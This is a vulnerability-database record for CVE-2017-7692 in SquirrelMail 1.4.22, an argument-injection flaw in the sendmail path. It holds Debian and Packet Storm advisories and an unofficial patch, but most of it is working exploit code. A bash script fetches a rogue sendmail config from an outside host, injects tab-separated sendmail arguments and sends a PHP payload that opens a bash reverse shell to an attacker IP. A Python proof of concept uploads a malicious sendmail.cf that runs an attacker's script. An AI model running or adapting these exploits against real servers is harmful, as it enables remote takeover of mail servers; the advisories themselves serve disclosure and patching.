Exploit (CVE-2017-7692) \\n\"\n#echo -e \"SquirrelMail_RCE_exploit.sh (ver. 1.0)\\n\"\n#echo -e \"Discovered and coded by: \\n\\nDawid Golunski \\nhttps://legalhackers.com \\033[0m\\n\\n\"\n\n\n# Base URL\nif [ $# -ne 1 ]; then\n\techo -e \"Usage: \\n$0 SquirrelMail_URL\"\n\techo -e \"Example: \\n$0 http://target/squirrelmail/ \\n\"\n\t\n\texit 2\nfi\nURL=\"$1\"\n\n# Log in\necho -e \"\\n[*] Enter SquirrelMail user credentials\"\nread -p \"user: \" squser\nread -sp \"pass: \" sqpass\n\necho -e \"\\n\\n[*] Logging in to SquirrelMail at $URL\"\ncurl -s -D /tmp/sqdata -d\"login_username=$squser&secretkey=$sqpass&js_autodetect_results=1&just_logged_in=1\" $URL/src/redirect.php | grep -q incorrect\nif [ $? -eq 0 ]; then\n\techo \"Invalid creds\"\n\texit 2\nfi\nsessid=\"`cat /tmp/sqdata | grep SQMSESS | tail -n1 | cut -d'=' -f2 | cut -d';' -f1`\"\nkeyid=\"`cat /tmp/sqdata | grep key | tail -n1 | cut -d'=' -f2 | cut -d';' -f1`\"\n\n\n# Prepare Sendmail cnf\n#\n# * The config will launch php via the following stanza:\n# \n# Mlocal,\tP=/usr/bin/php, F=lsDFMAw5:/|@qPn9S, S=EnvFromL/HdrFromL, R=EnvToL/HdrToL,\n# \t\tT=DNS/RFC822/X-Unix,\n# \t\tA=php -- $u $h ${client_addr}\n#\nwget -q -O/tmp/smcnf-exp https://legalhackers.com/exploits/sendmail-exploit.cf\n\n# Upload config\necho -e \"\\n\\n[*] Uploading Sendmail config\"\ntoken=\"`curl -s -b\"SQMSESSID=$sessid; key=$keyid\" \"$URL/src/compose.php?mailbox=INBOX&startMessage=1\" | grep smtoken | awk -F'value=\"' '{print $2}' | cut -d'\"' -f1 `\"\nattachid=\"`curl -H \"Expect:\" -s -b\"SQMSESSID=$sessid; key=$keyid\" -F\"smtoken=$token\" -F\"send_to=$mail\" -F\"subject=attach\" -F\"body=test\" -F\"attachfile=@/tmp/smcnf-exp\" -F\"username=$squser\" -F\"attach=Add\" $URL/src/compose.php | awk -F's:32' '{print $2}' | awk -F'\"' '{print $2}' | tr -d '\\n'`\"\nif [ ${#attachid} -lt 32 ]; then\n\techo \"Something went wrong. Failed to upload the sendmail file.\"\n\texit 2\nfi\n\n# Create Sendmail cmd string according to selected payload\necho -e \"\\n\\n[?] Select payload\\n\"\n# SELECT PAYLOAD\necho \"1 - File write (into /tmp/sqpoc)\"\necho \"2 - Remote Code Execution (with the uploaded smcnf-exp + phpsh)\"\necho\nread -p \"[1-2] \" pchoice\n\ncase $pchoice in\n\t1) payload=\"$squser@localhost\t-oQ/tmp/\t-X/tmp/sqpoc\" \n\t ;;\n\n\t2) payload=\"$squser@localhost\t-oQ/tmp/\t-C$sqspool/$attachid\" \n\t ;;\nesac\n\nif [ $pchoice -eq 2 ]; then\n\techo\n\tread -p \"Reverese shell IP: \" reverse_ip\n\tread -p \"Reverese shell PORT: \" reverse_port\nfi\n\n# Reverse shell code\nphprevsh=\"\n<?php \n\t\\$cmd = \\\"/bin/bash -c 'bash -i >/dev/tcp/$reverse_ip/$reverse_port 0<&1 2>&1 & '\\\";\n\tfile_put_contents(\\\"/tmp/cmd\\\", 'export PATH=\\\"\\$PATH\\\" ; export TERM=vt100 ;' . \\$cmd);\n\tsystem(\\\"/bin/bash /tmp/cmd ; rm -f /tmp/cmd\\\");\n?>\"\n\n\n# Set sendmail params in user settings\necho -e \"\\n[*] Injecting Sendmail command parameters\"\ntoken=\"`curl -s -b\"SQMSESSID=$sessid; key=$keyid\" \"$URL/src/options.php?optpage=personal\" | grep smtoken | awk -F'value=\"' '{print $2}' | cut -d'\"' -f1 `\"\ncurl -s -b\"SQMSESSID=$sessid; key=$keyid\" -d \"smtoken=$token&optpage=personal&optmode=submit&submit_personal=Submit\" --data-urlencode \"new_email_address=$payload\" \"$URL/src/options.php?optpage=personal\" | grep -q 'Success' 2>/dev/null\nif [ $? -ne 0 ]; then\n\techo \"Failed to inject sendmail parameters\"\n\texit 2\nfi\n\n# Send email which triggers the RCE vuln and runs phprevsh\necho -e \"\\n[*] Sending the email to trigger the vuln\"\n(sleep 2s && curl -s -D/tmp/sheaders -b\"SQMSESSID=$sessid; key=$keyid\" -d\"smtoken=$token\" -d\"startMessage=1\" -d\"session=0\" \\\n-d\"send_to=$squser@localhost\" -d\"subject=poc\" --data-urlencode \"body=$phprevsh\" -d\"send=Send\" -d\"username=$squser\" $URL/src/compose.php) &\n\nif [ $pchoice -eq 2 ]; then\n\techo -e \"\\n[*] Waiting for shell on $reverse_ip port $reverse_port\"\n\tnc -vv -l -p $reverse_port\nelse\n\techo -e \"\\n[*] The test file should have been written at /tmp/sqpoc\"\nfi\n\ngrep -q \"302 Found\" /tmp/sheaders\nif [ $? -eq 1 ]; then\n\techo \"There was a problem with sending email\"\n\texit 2\nfi\n\n\n# Done\necho -e \"\\n[*] All done. Exiting\"", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "debian": [{"lastseen": "2019-05-30T02:22:12", "bulletinFamily": "unix", "cvelist": ["CVE-2017-7692"], "description": "Package : squirrelmail\nVersion : 2:1.4.23~svn20120406-2+deb7u1\nCVE ID : CVE-2017-7692\n\nDawid Golunski and Filippo Cavallarin discovered that squirrelmail, a\nwebmail application, incorrectly handled a user-supplied value. This\nwould allow a logged-in user to run arbitrary commands on the server.\n\nFor Debian 7 &quot;Wheezy&quot;, these problems have been fixed in version\n2:1.4.23~svn20120406-2+deb7u1.\n\nWe recommend that you upgrade your squirrelmail packages.\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://wiki.debian.org/LTS\n", "edition": 2, "modified": "2017-05-15T09:16:56", "published": "2017-05-15T09:16:56", "id": "DEBIAN:DLA-941-1:C74C1", "href": "https://lists.debian.org/debian-lts-announce/2017/debian-lts-announce-201705/msg00012.html", "title": "[SECURITY] [DLA 941-1] squirrelmail security update", "type": "debian", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2019-05-30T02:22:59", "bulletinFamily": "unix", "cvelist": ["CVE-2017-7692"], "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-3852-1 security@debian.org\nhttps://www.debian.org/security/ Sebastien Delafond\nMay 13, 2017 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : squirrelmail\nCVE ID : CVE-2017-7692\n\nDawid Golunski and Filippo Cavallarin discovered that squirrelmail, a\nwebmail application, incorrectly handled a user-supplied value. This\nwould allow a logged-in user to run arbitrary commands on the server.\n\nFor the stable distribution (jessie), this problem has been fixed in\nversion 2:1.4.23~svn20120406-2+deb8u1.\n\nWe recommend that you upgrade your squirrelmail packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "edition": 2, "modified": "2017-05-13T11:36:13", "published": "2017-05-13T11:36:13", "id": "DEBIAN:DSA-3852-1:F4146", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2017/msg00111.html", "title": "[SECURITY] [DSA 3852-1] squirrelmail security update", "type": "debian", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "packetstorm": [{"lastseen": "2017-04-20T01:25:05", "description": "", "published": "2017-04-19T00:00:00", "type": "packetstorm", "title": "Squirrelmail 1.4.22 Remote Code Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-7692"], "modified": "2017-04-19T00:00:00", "id": "PACKETSTORM:142212", "href": "https://packetstormsecurity.com/files/142212/Squirrelmail-1.4.22-Remote-Code-Execution.html", "sourceData": "`Advisory ID: SGMA17-001 \nTitle: Squirrelmail Remote Code Execution \nProduct: Squirrelmail \nVersion: 1.4.22 and probably prior \nVendor: squirrelmail.org \nType: Command Injection \nRisk level: 4 / 5 \nCredit: filippo.cavallarin@wearesegment.com \nCVE: CVE-2017-7692 \nVendor notification: 2017-04-04 \nVendor fix: N/A \nPublic disclosure: 2017-04-19 \n \n \n \n \nDETAILS \n \nSquirrelmail version 1.4.22 (and probably prior) is vulnerable to a remote code execution vulnerability because \nit fails to sanitize a string before passing it to a popen call. It's possible to exploit this vulnerability to \nexecute arbitrary shell commands on the remote server. \n \nThe problem is in Deliver_SendMail.class.php on initStream function that uses escapeshellcmd() to sanitize the \nsendmail command before executing it. The use of escapeshellcmd() is not correct in this case since it don't \nescapes whitespaces allowing the injection of arbitrary command parameters. \n \n$this->sendmail_command = \"$sendmail_path $this->sendmail_args -f$envelopefrom\"; \n$stream = popen(escapeshellcmd($this->sendmail_command), \"w\"); \n \n \nThe $envelopefrom variable is controlled by the attacker, hence it's possible to trick sendmail to use an \nattacker-provided configuration file that triggers the execution of an arbitrary command. \n \nIn order to exploit this vulnerability the MTA in use must be sendmail and Squirrelmail must be configured \nto use it as commandline (useSendmail directive of the config file set to true). \nAlso, the edit_identity directive of the config file must be bet to true, but this is the default configuration. \n \nTo reproduce the issue follow these steps: \n1. Create a rogue sendmail.cf that triggers the execution of a /usr/bin/touch: \n[...] \nMlocal, P=/usr/bin/touch, F=lsDFMAw5:/|@qPn9S, S=EnvFromL/HdrFromL, R=EnvToL/HdrToL, \nT=DNS/RFC822/X-Unix, \nA=X /tmp/executed \n2. Upload it as a mail attachment and get it's remote name (ex: lF51mGPJwdqzV3LEDlCdSVNpohzgF7sD) \n3. Go to Options -> Personal Informations and set the following payload as Email Address: \n<aaa@abc.com -OQueueDirectory=/tmp -C /var/local/squirrelmail/attach/lF51mGPJwdqzV3LEDlCdSVNpohzgF7sD> \n4. Send an email \n5. Verify the execution of the command with \"ls /tmp/executed\" on the remote server \n \n \n \n \nPROOF OF CONCEPT \n \nThe followig python script exploits this vulnerability to execute an attacker provided bash script on the remote server. \n \nBOF \n#!/usr/bin/env python \n# -*- coding: utf-8 -*- \n \n\"\"\" \n \nSquirrelMail 1.4.22 Remote Code Execution (authenticated) \nExploit code for CVE-2017-7692 \nfilippo.cavallarin@wearesegment.com \n \n\"\"\" \n \nfrom __future__ import unicode_literals \nimport sys \nimport os \nimport re \nimport requests \n \nreload(sys) \nsys.setdefaultencoding('utf8') \n \n \nSENDMAILCF=\"/tmp/squirrelmail1_4_22-sendmailcf-rce\" \nCOMPOSE = \"/src/compose.php\" \nINFOS = \"/src/options.php?optpage=personal\" \nSQM_ATTACH_PATH = \"/var/local/squirrelmail/attach/\" \n# must be enclosed in <> otherwise spaces will be removed .. \nSENDER = \"<px@xxxx.com -OQueueDirectory=/tmp -C %s%s>\" \n \n \nSESSID = \"\" \nBASEURL = \"\" \n \n \ndef attach(attachment): \nurl = \"%s%s\" % (BASEURL, COMPOSE) \ntoken = get_csrf_token(url) \n \nvalues = { \n\"smtoken\": token, \n\"attach\": \"add\" \n} \n \ntry: \nfiles = {'attachfile': open(attachment,'rb')} \nresp = requests.post(url, files=files, data=values, cookies={'SQMSESSID':SESSID}) \nfname = re.search(r'att_local_name\";s:[0-9]+:\"([a-zA-Z0-9]+)\"', resp.text) \nif not fname: \nprint \"\\nError: unable to upload file %s\" % attachment \nreturn fname.group(1) \n \nexcept Exception as e: \nprint \"\\nError: %s\" % e \nsys.exit(1) \n \n \ndef send(): \nurl = \"%s%s\" % (BASEURL, COMPOSE) \ntoken = get_csrf_token(url) \n \nvalues = { \n\"smtoken\": token, \n\"send_to\": \"root\", \n\"send\": \"Send\" \n} \n \ntry: \nresp = requests.post(url, data=values, cookies={'SQMSESSID':SESSID}) \nexcept Exception as e: \nprint \"\\nError: %s\" % e \nsys.exit(1) \n \n \ndef set_identity(sender): \nurl = \"%s%s\" % (BASEURL, INFOS) \ntoken = get_csrf_token(url) \nvalues = { \n\"smtoken\": token, \n\"optpage\": \"personal\", \n\"optmode\": \"submit\", \n\"new_email_address\": sender, \n\"submit_personal\": \"Submit\" \n} \n \ntry: \nrequests.post(url, data=values, cookies={'SQMSESSID':SESSID}) \nexcept Exception as e: \nprint \"\\nError: %s\" % e \nsys.exit(1) \n \n \ndef get_csrf_token(url): \ntry: \nbody = requests.get(url, cookies={'SQMSESSID':SESSID}).text \ninp = re.search(r'<input.*name=\"smtoken\".*>', body, re.MULTILINE) \ntoken = re.search(r'value=\"([a-zA-Z0-9]+)\"', inp.group(0)) \nif token: \nreturn token.group(1) \nexcept Exception as e: \npass \n \nprint \"\\nUnable to get CSRF token\" \nsys.exit(1) \n \ndef outw(s): \nsys.stdout.write(s) \nsys.stdout.flush() \n \ndef main(argv): \nglobal BASEURL \nglobal SESSID \n \nif len(argv) != 4: \nprint ( \n\"SquirrelMail 1.4.22 Remote Code Execution (authenticated) - filippo.cavallarin@wearesegment.com\\n\" \n\"The target server must use sendmail and squirrelmail must be configured to use /usr/bin/sendmail\\n\" \n\"Usage:\\n\" \n\" %s <url> <session_id> <script>\\n\" \n\" url: the url of squirrelmail\\n\" \n\" session_id: the value of SQMSESSID cookie\\n\" \n\" script: the path to the bash script to be executed on the target\\n\" \n\"Example:\\n\" \n\" %s http:/example.com/squirrelmail/ l2rapvcovsui1on0b4i5boev24 reverseshell.sh\" \n) % (argv[0], argv[0]) \n \nsys.exit(1) \n \nBASEURL = argv[1] \nSESSID = argv[2] \nscript = argv[3] \n \noutw(\"Uploading script ... \") \nscript_fname = attach(script) \nprint \"ok\" \n \n \noutw(\"Generating sendmail.cf ... \") \ntry: \nscript_path = \"%s%s\" % (SQM_ATTACH_PATH, script_fname) \nwith open(SENDMAILCF, 'w') as f: \nf.write(SENDMAILCF_CONTENT % script_path) \nexcept Exception as e: \nprint \"\\nError: %s\" % e \nsys.exit(1) \nprint \"ok\" \n \noutw(\"Uploading sendmail.cf ... \") \nsmc_fname = attach(SENDMAILCF) \nos.remove(SENDMAILCF) \nprint \"ok\" \n \noutw(\"Updating user options ... \") \nsender = SENDER % (SQM_ATTACH_PATH, smc_fname) \nset_identity(sender) \nprint \"ok\" \n \noutw(\"Checking identity field ... \") \nicheck = requests.get(\"%s%s\" % (BASEURL, INFOS), cookies={'SQMSESSID':SESSID}).text \nif not smc_fname in icheck: \nprint \"\\nError: unable to set identity field .. maybe squirrelmail is configured with edit_identity=false\" \nsys.exit(1) \nprint \"ok\" \n \noutw(\"Executing script ... \") \nsend() \nprint \"ok\\n\" \nsys.exit(0) \n \nSENDMAILCF_CONTENT = \"\"\" \nO DontBlameSendmail=,AssumeSafeChown,ForwardFileInGroupWritableDirPath,GroupWritableForwardFileSafe,GroupWritableIncludeFileSafe,IncludeFileInGroupWritableDirPath,DontWarnForwardFileInUnsafeDirPath,TrustStickyBit,NonRootSafeAddr,GroupWritableIncludeFile,GroupReadableDefaultAuthInfoFile \nKdequote dequote \nScanonify=3 \nR$@ $@ <@> \nR$* $: $1 <@> mark addresses \nR$* < $* > $* <@> $: $1 < $2 > $3 unmark <addr> \nR@ $* <@> $: @ $1 unmark @host:... \nR$* [ IPv6 : $+ ] <@> $: $1 [ IPv6 : $2 ] unmark IPv6 addr \nR$* :: $* <@> $: $1 :: $2 unmark node::addr \nR:include: $* <@> $: :include: $1 unmark :include:... \nR$* : $* [ $* ] $: $1 : $2 [ $3 ] <@> remark if leading colon \nR$* : $* <@> $: $2 strip colon if marked \nR$* <@> $: $1 unmark \nR$* ; $1 strip trailing semi \nR$* < $+ :; > $* $@ $2 :; <@> catch <list:;> \nR$* < $* ; > $1 < $2 > bogus bracketed semi \nR$@ $@ :; <@> \nR$* $: < $1 > housekeeping <> \nR$+ < $* > < $2 > strip excess on left \nR< $* > $+ < $1 > strip excess on right \nR<> $@ < @ > MAIL FROM:<> case \nR< $+ > $: $1 remove housekeeping <> \nR@ $+ , $+ $2 \nR@ [ $* ] : $+ $2 \nR@ $+ : $+ $2 \nR $+ : $* ; @ $+ $@ $>Canonify2 $1 : $2 ; < @ $3 > list syntax \nR $+ : $* ; $@ $1 : $2; list syntax \nR$+ @ $+ $: $1 < @ $2 > focus on domain \nR$+ < $+ @ $+ > $1 $2 < @ $3 > move gaze right \nR$+ < @ $+ > $@ $>Canonify2 $1 < @ $2 > already canonical \nR$- ! $+ $@ $>Canonify2 $2 < @ $1 .UUCP > resolve uucp names \nR$+ . $- ! $+ $@ $>Canonify2 $3 < @ $1 . $2 > domain uucps \nR$+ ! $+ $@ $>Canonify2 $2 < @ $1 .UUCP > uucp subdomains \nR$* %% $* $1 @ $2 First make them all @s. \nR$* @ $* @ $* $1 %% $2 @ $3 Undo all but the last. \nR$* @ $* $@ $>Canonify2 $1 < @ $2 > Insert < > and finish \nR$* $@ $>Canonify2 $1 \nSCanonify2=96 \nR$* < @ localhost > $* $: $1 < @ $j . > $2 no domain at all \nR$* < @ localhost . $m > $* $: $1 < @ $j . > $2 local domain \nR$* < @ localhost . UUCP > $* $: $1 < @ $j . > $2 .UUCP domain \nR$* < @ [ $+ ] > $* $: $1 < @@ [ $2 ] > $3 mark [addr] \nR$* < @@ $=w > $* $: $1 < @ $j . > $3 self-literal \nR$* < @@ $+ > $* $@ $1 < @ $2 > $3 canon IP addr \nSfinal=4 \nR$+ :; <@> $@ $1 : handle <list:;> \nR$* <@> $@ handle <> and list:; \nR$* < @ $+ . > $* $1 < @ $2 > $3 \nR$* < @ *LOCAL* > $* $1 < @ $j > $2 \nR$* < $+ > $* $1 $2 $3 defocus \nR@ $+ : @ $+ : $+ @ $1 , @ $2 : $3 <route-addr> canonical \nR@ $* $@ @ $1 ... and exit \nR$+ @ $- . UUCP $2!$1 u@h.UUCP => h!u \nR$+ %% $=w @ $=w $1 @ $2 u%%host@host => u@host \nSRecurse=97 \nR$* $: $>canonify $1 \nR$* $@ $>parse $1 \nSparse=0 \nR$* $: $>Parse0 $1 initial parsing \nR<@> $#local $: <@> special case error msgs \nR$* $: $>ParseLocal $1 handle local hacks \nR$* $: $>Parse1 $1 final parsing \nSParse0 \nR<@> $@ <@> special case error msgs \nR$* : $* ; <@> $#error $@ 5.1.3 $: \"553 List:; syntax illegal for recipient addresses\" \nR@ <@ $* > < @ $1 > catch \"@@host\" bogosity \nR<@ $+> $#error $@ 5.1.3 $: \"553 User address required\" \nR$+ <@> $#error $@ 5.1.3 $: \"553 Hostname required\" \nR$* $: <> $1 \nR<> $* < @ [ $* ] : $+ > $* $1 < @ [ $2 ] : $3 > $4 \nR<> $* < @ [ $* ] , $+ > $* $1 < @ [ $2 ] , $3 > $4 \nR<> $* < @ [ $* ] $+ > $* $#error $@ 5.1.2 $: \"553 Invalid address\" \nR<> $* < @ [ $+ ] > $* $1 < @ [ $2 ] > $3 \nR<> $* <$* : $* > $* $#error $@ 5.1.3 $: \"553 Colon illegal in host name part\" \nR<> $* $1 \nR$* < @ . $* > $* $#error $@ 5.1.2 $: \"553 Invalid host name\" \nR$* < @ $* .. $* > $* $#error $@ 5.1.2 $: \"553 Invalid host name\" \nR$* < @ $* @ > $* $#error $@ 5.1.2 $: \"553 Invalid route address\" \nR$* @ $* < @ $* > $* $#error $@ 5.1.3 $: \"553 Invalid route address\" \nR$* , $~O $* $#error $@ 5.1.3 $: \"553 Invalid route address\" \nR$* < @ > $* $@ $>Parse0 $>canonify $1 user@ => user \nR< @ $=w . > : $* $@ $>Parse0 $>canonify $2 @here:... -> ... \nR$- < @ $=w . > $: $(dequote $1 $) < @ $2 . > dequote \"foo\"@here \nR< @ $+ > $#error $@ 5.1.3 $: \"553 User address required\" \nR$* $=O $* < @ $=w . > $@ $>Parse0 $>canonify $1 $2 $3 ...@here -> ... \nR$- $: $(dequote $1 $) < @ *LOCAL* > dequote \"foo\" \nR< @ *LOCAL* > $#error $@ 5.1.3 $: \"553 User address required\" \nR$* $=O $* < @ *LOCAL* > \n$@ $>Parse0 $>canonify $1 $2 $3 ...@*LOCAL* -> ... \nR$* < @ *LOCAL* > $: $1 \nSParse1 \nR$* < @ [ $+ ] > $* $: $>ParseLocal $1 < @ [ $2 ] > $3 numeric internet spec \nR$* < @ [ $+ ] > $* $: $1 < @ [ $2 ] : $S > $3 Add smart host to path \nR$* < @ [ $+ ] : > $* $#esmtp $@ [$2] $: $1 < @ [$2] > $3 no smarthost: send \nR$* < @ [ $+ ] : $- : $*> $* $#$3 $@ $4 $: $1 < @ [$2] > $5 smarthost with mailer \nR$* < @ [ $+ ] : $+ > $* $#esmtp $@ $3 $: $1 < @ [$2] > $4 smarthost without mailer \nR$=L < @ $=w . > $#local $: @ $1 special local names \nR$+ < @ $=w . > $#local $: $1 regular local name \nR$* < @ $* > $* $: $>MailerToTriple < $S > $1 < @ $2 > $3 glue on smarthost name \nR$* < @$* > $* $#esmtp $@ $2 $: $1 < @ $2 > $3 user@host.domain \nR$=L $#local $: @ $1 special local names \nR$+ $#local $: $1 regular local names \nSLocal_localaddr \nSlocaladdr=5 \nR$+ $: $1 $| $>\"Local_localaddr\" $1 \nR$+ $| $#ok $@ $1 no change \nR$+ $| $#$* $#$2 \nR$+ $| $* $: $1 \nR$+ + * $#local $@ $&h $: $1 \nR$+ + $* $#local $@ + $2 $: $1 + * \nR$+ $: <> $1 \nR< > $+ $: < > < $1 <> $&h > nope, restore +detail \nR< > < $+ <> + $* > $: < > < $1 + $2 > check whether +detail \nR< > < $+ <> $* > $: < > < $1 > else discard \nR< > < $+ + $* > $* < > < $1 > + $2 $3 find the user part \nR< > < $+ > + $* $#local $@ $2 $: @ $1 strip the extra + \nR< > < $+ > $@ $1 no +detail \nR$+ $: $1 <> $&h add +detail back in \nR$+ <> + $* $: $1 + $2 check whether +detail \nR$+ <> $* $: $1 else discard \nR< local : $* > $* $: $>MailerToTriple < local : $1 > $2 no host extension \nR< error : $* > $* $: $>MailerToTriple < error : $1 > $2 no host extension \nR< $~[ : $+ > $+ $: $>MailerToTriple < $1 : $2 > $3 < @ $2 > \nR< $+ > $+ $@ $>MailerToTriple < $1 > $2 < @ $1 > \nSParseLocal=98 \nSEnvFromL \nR<@> $n errors to mailer-daemon \nR@ <@ $*> $n temporarily bypass Sun bogosity \nR$+ $: $>AddDomain $1 add local domain if needed \nR$* $: $>MasqEnv $1 do masquerading \nSEnvToL \nR$+ < @ $* > $: $1 strip host part \nR$+ + $* $: < $&{addr_type} > $1 + $2 mark with addr type \nR<e s> $+ + $* $: $1 remove +detail for sender \nR< $* > $+ $: $2 else remove mark \nSHdrFromL \nR<@> $n errors to mailer-daemon \nR@ <@ $*> $n temporarily bypass Sun bogosity \nR$+ $: $>AddDomain $1 add local domain if needed \nR$* $: $>MasqHdr $1 do masquerading \nSHdrToL \nR$+ $: $>AddDomain $1 add local domain if needed \nR$* $: $>MasqHdr $1 do all-masquerading \nSAddDomain \nR$* < @ $* > $* $@ $1 < @ $2 > $3 already fully qualified \nR$+ $@ $1 < @ *LOCAL* > add local qualification \nMlocal, P=/bin/bash, F=lsDFMAw5:/|@qPn9S, S=EnvFromL/HdrFromL, R=EnvToL/HdrToL, \nT=DNS/RFC822/X-Unix, \nA=X %s \nMprog, P=/bin/sh, F=lsDFMoqeu9, S=EnvFromL/HdrFromL, R=EnvToL/HdrToL, D=$z:/, \nT=X-Unix/X-Unix/X-Unix, \nA=sh -c $u \n \n\"\"\" \n \nif __name__ == '__main__': \nmain(sys.argv) \n \nEOF \n \n \n \n \nSOLUTION \n \nSince the vendor did not respond to our mails, no official fix is available. \nHowever, the following unofficial patch can be used to fix this vulnerability. \n \nBOF \ndiff -ruN squirrelmail-webmail-1.4.22/class/deliver/Deliver_SendMail.class.php squirrelmail-webmail-1.4.22-fix-CVE-2017-7692/class/deliver/Deliver_SendMail.class.php \n--- squirrelmail-webmail-1.4.22/class/deliver/Deliver_SendMail.class.php 2011-01-06 02:44:03.000000000 +0000 \n+++ squirrelmail-webmail-1.4.22-fix-CVE-2017-7692/class/deliver/Deliver_SendMail.class.php 2017-04-18 11:42:26.505181944 +0000 \n@@ -93,9 +93,9 @@ \n$envelopefrom = trim($from->mailbox.'@'.$from->host); \n$envelopefrom = str_replace(array(\"\\0\",\"\\n\"),array('',''),$envelopefrom); \n// save executed command for future reference \n- $this->sendmail_command = \"$sendmail_path $this->sendmail_args -f$envelopefrom\"; \n+ $this->sendmail_command = escapeshellcmd(\"$sendmail_path $this->sendmail_args -f\") . escapeshellarg($envelopefrom); \n// open process handle for writing \n- $stream = popen(escapeshellcmd($this->sendmail_command), \"w\"); \n+ $stream = popen($this->sendmail_command, \"w\"); \nreturn $stream; \n} \nEOF \n \n \n \n \nREFERENCES \n \nhttps://squirrelmail.org/ \nhttps://www.wearesegment.com/research/Squirrelmail-Remote-Code-Execution.html \n \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/142212/SGMA17-001.txt"}, {"lastseen": "2017-04-24T17:25:15", "description": "", "published": "2017-04-23T00:00:00", "type": "packetstorm", "title": "SquirrelMail 1.4.22 Remote Code Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-10074", "CVE-2016-10045", "CVE-2017-7692", "CVE-2016-10033"], "modified": "2017-04-23T00:00:00", "id": "PACKETSTORM:142266", "href": "https://packetstormsecurity.com/files/142266/SquirrelMail-1.4.22-Remote-Code-Execution.html", "sourceData": "` \n \n__ __ __ __ __ \n/ / ___ ____ _____ _/ / / / / /___ ______/ /_____ __________ \n/ / / _ \\/ __ `/ __ `/ / / /_/ / __ `/ ___/ //_/ _ \\/ ___/ ___/ \n/ /___/ __/ /_/ / /_/ / / / __ / /_/ / /__/ ,< / __/ / (__ ) \n/_____/\\___/\\__, /\\__,_/_/ /_/ /_/\\__,_/\\___/_/|_|\\___/_/ /____/ \n/____/ \n \n \nFollow @dawid_golunski \n \n \n \n~~~~~~~~~~~~ ExploitBox.io ~~~~~~~~~~~~~~~~ \nInterested in security / vulns / exploits ? \nCheck out the new project of the author of this advisory: \n \nExploitBox.io \nA Playground & Labs for security folks into \nhacking & the art of exploitation \n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ \n \n \n \n \n============================================ \n- Author: Dawid Golunski \n- dawid[at]legalhackers.com \n- https://legalhackers.com \n \n- CVE-2017-7692 \n- Release date: 22.04.2017 \n- Revision 1.0 \n- Severity: Critical \n============================================= \n \n \nI. VULNERABILITY \n------------------------- \n \nSquirrelMail <= 1.4.22 Remote Code Execution \n \n \nII. BACKGROUND \n------------------------- \n \n\" \nSquirrelMail is a standards-based webmail package written in PHP. \nIt includes built-in pure PHP support for the IMAP and SMTP protocols, and all \npages render in pure HTML 4.0 (with no JavaScript required) for maximum \ncompatibility across browsers. It has very few requirements and is very easy \nto configure and install. SquirrelMail has all the functionality you would \nwant from an email client, including strong MIME support, address books, and \nfolder manipulation.\" \n \nhttps://squirrelmail.org/about/ \n \nIII. INTRODUCTION \n------------------------- \n \nSquirrelMail is affected by a critical Remote Code Execution vulnerability \nwhich stems from insufficient escaping of user-supplied data when \nSquirrelMail has been configured with Sendmail as the main transport. \nAn authenticated attacker may be able to exploit the vulnerability \nto execute arbitrary commands on the target and compromise the remote \nsystem. \n \nIV. DESCRIPTION \n------------------------- \n \nThe vulnerability is similar to the following vulnerabilities previously discovered \nby the author of this advisory: \n \nhttps://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10033-Vuln.html \n \nhttps://legalhackers.com/advisories/SwiftMailer-Exploit-Remote-Code-Exec-CVE-2016-10074-Vuln.html \n \n \nWhen SquirrelMail has been configured with Sendmail as delivery transport, \nSquirrelMail uses the following function to send out user emails: \n \n-----[ ./class/deliver/Deliver_SendMail.class.php ]----- \n \nfunction initStream($message, $sendmail_path, $ignore=0, $ignore='', $ignore='', $ignore='', $ignore='', $ignore=false, $ignore='') { \n$rfc822_header = $message->rfc822_header; \n$from = $rfc822_header->from[0]; \n$envelopefrom = trim($from->mailbox.'@'.$from->host); \n$envelopefrom = str_replace(array(\"\\0\",\"\\n\"),array('',''),$envelopefrom); \n// save executed command for future reference \n$this->sendmail_command = \"$sendmail_path $this->sendmail_args -f$envelopefrom\"; \n// open process handle for writing \n$stream = popen(escapeshellcmd($this->sendmail_command), \"w\"); \nreturn $stream; \n} \n \n--------------------------------------------------------- \n \n \nSquirrelMail allows authenticated users to control envelopefrom (Return-Path) address \nthrough the webmail web interface. \n \nAs we can see it calls str_replace() to sanitize the user input to prevent \ninjection of additional parameters to the sendmail command. \nUnfortunately it does not take into account \\t (TAB) character which can be \nused by attackers to inject additional parameters. \n \n \nIf attacker sets their email address (Return-Path) in the options to \nattacker@localhost -oQ/tmp/ -X/tmp/sqpoc \n \nand then sends a new email. \nThe sendmail program will be called with the following arguments: \n \nArg no. 0 == [/usr/sbin/sendmail] \nArg no. 1 == [-i] \nArg no. 2 == [-t] \nArg no. 3 == [-fattacker@localhost] \nArg no. 4 == [-oQ/tmp/] \nArg no. 5 == [-X/tmp/sqpoc] \n \nwhich will result in /tmp/sqpc file created on disk with email log (-X parameter \ncauses sendmail to save the debug/maillog into a file). \n \n \nAs demonstrated by the PoC exploit below, attacker can also inject -Cparameter to \nprovide a malicious sendmail config file which can be uploaded as an attachment to \nachieve arbitrary command execution. \n \n \nV. PROOF OF CONCEPT EXPLOIT \n------------------------- \n \n \n-----[ SquirrelMail_RCE_exploit.sh ]------ \n \n#!/bin/bash \n# \nint='\\033[94m \n__ __ __ __ __ \n/ / ___ ____ _____ _/ / / / / /___ ______/ /_____ __________ \n/ / / _ \\/ __ `/ __ `/ / / /_/ / __ `/ ___/ //_/ _ \\/ ___/ ___/ \n/ /___/ __/ /_/ / /_/ / / / __ / /_/ / /__/ ,< / __/ / 